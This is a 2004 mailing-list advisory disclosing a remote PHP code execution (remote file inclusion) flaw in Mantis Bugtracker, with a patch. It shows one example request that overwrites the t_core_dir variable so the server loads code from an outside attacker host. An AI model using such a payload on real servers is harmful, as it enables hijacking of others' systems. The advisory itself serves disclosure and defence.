<<< Date Index >>>     <<< Thread Index >>>

Mantis Bugtracker Remote PHP Code Execution Vulnerability




--------------------------------------------------------------------------- 
           Mantis Bugtracker Remote PHP Code 
Execution Vulnerability 
--------------------------------------------------------------------------- 
 
Author: Joxean Koret 
Date: 08-01-2004 
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
Mantis Bugtracker 
 
Mantis is a web-based bugtracking system. It is 
written in the PHP scripting  
language and requires the MySQL database and 
a webserver.  
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Remote PHP Code Execution Vulnerability 
 
A1. If the REGISTER_GLOBAL variable is set an 
attacker can execute arbitrary  
php code by overwriting the global variable 
$t_core_dir with our desired url  
(for example 
http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/) 
  
 The following files are vulnerables :  
  
 bug_api.php -> at line 22? (using variable 
$t_core_path) 
 relationship_api.php -> Line 14 (using variable 
$t_core_dir) 
 
The fix: 
~~~~~~~~ 
 
Both of these issues have now been fixed in 
CVS.  
 
There is also a Patch for the Mantis 0.19.0a 
version  
 
===================================================================== 
mantis.patch 
 
bug_api.php 
 @@ -19,7 +19,7 @@ 
      require_once( $t_core_dir . 
'sponsorship_api.php' ); 
   
      # MASC RELATIONSHIP 
 - 
require_once( $t_core_path.'relationship_api.php' ); 
 + 
require_once( $t_core_dir.'relationship_api.php' ); 
      # MASC RELATIONSHIP 
  
 and to relationship API: 
      ### Relationship API ### 
   
 + $t_core_dir = 
dirname( __FILE__ ).DIRECTORY_SEPARATOR; 
 + 
      require_once( $t_core_dir . 
'collapse_api.php' ); 
   
      # MASC RELATIONSHIP  
 
===================================================================== 
--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 
 
        Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es